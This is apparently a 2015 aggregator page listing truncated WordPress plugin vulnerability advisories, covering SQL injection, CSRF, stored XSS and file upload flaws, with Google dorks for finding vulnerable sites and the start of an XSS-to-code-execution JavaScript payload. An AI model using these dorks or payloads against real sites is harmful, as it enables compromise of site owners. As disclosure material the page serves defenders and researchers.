WordPress Ultimate Product Catalogue 3.1.2 SQL Injection

15 May 2015 - Source: http://www.mondounix.com
--------
ISSUE 1:
 
# Exploit Title: Unauthenticated SQLi in Item_ID POST parameter on Ultimate Product Catalogue wordpress plugin
# Google Dork: inurl:"SingleProduct" intext:"Back to catalogue" intext:"Category", inurl:"/wp-content/plugins/ultimate-product-catalogue/product-sheets/"
# Date: 22/04/2015
# Exploit Author: Felipe Molina de la Torre (@felmoltor)
# Vendor Homepage: https://wordpress.org/plugins/ultimate-product-catalogue/
# Software Link: https://downloads.wordpress.org/plugin/ultimate-product-catalogue.3.1.2.zip
# Version: <= 3.1.2, Communicated and Fixed by the Vendor in 3.1.3
# Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turned off, Apache 2.4.0 (Ubuntu)
# CVE...


WordPress Freshmail 1.5.8 SQL Injection

15 May 2015 - Source: http://www.mondounix.com
------------------------
ISSUE 1:
 
 
# Exploit Title: Unauthenticated SQL Injection on Wordpress Freshmail (#1)
# Google Dork: N/A
# Date: 05/05/2015
# Exploit Author: Felipe Molina de la Torre (@felmoltor)
# Vendor Homepage: http://freshmail.com/
# Software Link: https://downloads.wordpress.org/plugin/freshmail-newsletter.latest-stable.zip
# Version: <= 1.5.8, Communicated and Fixed by the Vendor in 1.6
# Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turned off, Apache 2.4.0 (Ubuntu)
# CVE : N/A
# Category: webapps
 
1. Summary
------------------
 
Freshmail plugin is an email...


WordPress Ad Inserter 1.5.2 CSRF / XSS

9 May 2015 - Source: http://www.mondounix.com
================================================================
CSRF/Stored XSS Vulnerability in Ad Inserter Plugin 
================================================================
 
 
 
Overview
========
 
* Title: CSRF and Stored XSS Vulnerability in Ad Inserter Wordpress Plugin
* Author: Kaustubh G. Padwad
* Plugin Homepage: https://wordpress.org/plugins/ad-inserter/
* Severity: HIGH
* Version Affected: Version 1.5.2 and mostly prior to it
* Version Tested: Version 1.5.2
* Version patched:
 
Description 
===========
 
Vulnerable Parameter 
--------------------
* ad1_name
* Block 1
* Block Name
* adinserter name
* disable adinserter 
 
 
About...


WordPress Embed-Articles 7.0.3 CSRF / XSS

9 May 2015 - Source: http://www.mondounix.com
======================================================
CSRF/Stored XSS Vulnerability in embed articles Plugin
======================================================
 
 
 
Overview
========
 
* Title: CSRF and Stored XSS Vulnerability in embed-articles Wordpress Plugin
* Author: Kaustubh G. Padwad
* Plugin Homepage: https://wordpress.org/plugins/embed-articles/
* Severity: HIGH
* Version Affected: Version 7.0.3 and mostly prior to it
* Version Tested: Version 7.0.3
* Version patched:
 
Description 
===========
 
Vulnerable Parameter 
--------------------
 
* API Key
 
About Vulnerability
-------------------
This plugin is vulnerable to a combination of...


WordPress Akismet 3.1.1 Cross Site Scripting

9 May 2015 - Source: http://www.mondounix.com
# Exploit Title: Wordpress Akismet 3.1.1 Plugin - XSS Vulnerability
# Google Dork: inurl:/wp-content/plugins/akismet/akismet.php
# Date: 2014-12-29
# Exploit Author: Ehsan Ice
# Software Link: https://akismet.com/ , https://wordpress.org/plugins/akismet/developers/
# Download Link: https://downloads.wordpress.org/plugin/akismet.3.1.1.zip
# Version : 3.1.1
# Tested on: Kali , Windows
# CVE : N/A
 
 XSS Vulnerability
 http://site/wp-content/plugins/akismet/akismet.php
 http://site/wp-content/plugins/akismet/class.akismet-admin.php
 
 User input reaches a sensitive sink when the function add_comment_author_url() is called.
 
428: print print (wp_update_comment($comment));  // class.akismet-admin.php
426: $comment['comment_author_url']...


WordPress 4.2.1 XSS / Code Execution

9 May 2015 - Source: http://www.mondounix.com
/*
Author: @Evex_1337
Title: Wordpress XSS to RCE
Description: This Exploit Uses XSS Vulnerabilities in Wordpress
Plugins/Themes/Core To End Up Executing Code After Being Triggered By An
Administrator Privileged User. ¯\_(ツ)_/¯
Reference: http://research.evex.pw/?vuln=14
Enjoy.
 
*/
//Installed Plugins Page
plugins = (window.location['href'].indexOf('/wp-admin/') != - 1) ? 'plugins.php' : 'wp-admin/plugins.php';
//Inject "XSS" Div
jQuery('body').append('<div id="xss" ></div>');
xss_div = jQuery('#xss');
xss_div.hide();
//Get Installed Plugins Page Source and Append it to "XSS" Div
jQuery.ajax({
  url: plugins,
  type: 'GET',
  async: false,
  cache: false,
  timeout:...


WordPress Ultimate Product Catalogue 3.1.2 XSS / CSRF / File Upload

9 May 2015 - Source: http://www.mondounix.com
# Exploit Title: Multiple Persistent XSS & CSRF & File Upload on Ultimate Product Catalogue 3.1.2
# Google Dork: inurl:"SingleProduct" intext:"Back to catalogue" intext:"Category", inurl:"/wp-content/plugins/ultimate-product-catalogue/product-sheets/"
# Date: 22/04/2015
# Exploit Author: Felipe Molina de la Torre (@felmoltor)
# Vendor Homepage: https://wordpress.org/plugins/ultimate-product-catalogue/
# Software Link: https://downloads.wordpress.org/plugin/ultimate-product-catalogue.3.1.2.zip
# Version: <= 3.1.2, Communicated and Fixed by the Vendor in 3.1.5
# Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turned off, Apache 2.4.0 (Ubuntu)
# CVE : N/A
# Category: webapps
 
1....


WordPress 4.2 Cross Site Scripting

9 May 2015 - Source: http://www.mondounix.com
*Overview*
Current versions of WordPress are vulnerable to a stored XSS. An
unauthenticated attacker can inject JavaScript in WordPress comments. The
script is triggered when the comment is viewed.
 
If triggered by a logged-in administrator, under default settings the
attacker can leverage the vulnerability to execute arbitrary code on the
server via the plugin and theme editors.
 
Alternatively the attacker could change the administrator’s password,
create new administrator accounts, or do whatever else the currently
logged-in administrator can do on the target system.
 
*Details*
If the comment text is long enough, it will be truncated when inserted in
the database. The MySQL TEXT type size limit is 64 kilobytes...


WordPress WooThemes WooFramework 4.5.1 Cross Site Scripting

9 May 2015 - Source: http://www.mondounix.com
------------------------------------------------------------------------------
WooThemes WooFramework 4.5.1 Authenticated Cross Site Scripting (XSS)
------------------------------------------------------------------------------
 
[-] Vulnerability Description:
 
https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
 
The vulnerability is in the function "woo_sbm_callback":
Vuln Code:
function woo_sbm_callback() {
    ...
    $save_type = $_POST['type'];
    ...
    if($save_type == 'woo_sbm_get_links'){
 
        $data = $_POST['data'];
        parse_str($data,$data_array);
        $type = $data_array['type'];
        $slug = $data_array['slug'];
        $name = $data_array['name'];
        $id...


WordPress Yoast Google Analytics Cross Site Scripting

9 May 2015 - Source: http://www.mondounix.com
OVERVIEW
==========
 
Google Analytics by Yoast is one of the most popular WordPress
plug-ins with over 7 million downloads and "1+ million" active
installs. Last month Yoast patched a stored XSS we reported in the
plug-in. Shortly after this we identified another bug of a similar
severity. The second stored XSS has now been corrected.
 
An unauthenticated attacker can store JavaScript in the WordPress
administrator’s Dashboard on the target system. The script will be
triggered when an administrator views the Analytics panel next time.
No other user interaction is required.
 
Under default configuration the injected script can execute arbitrary
code on the web server via the plugin or theme editors.
 
Alternatively...
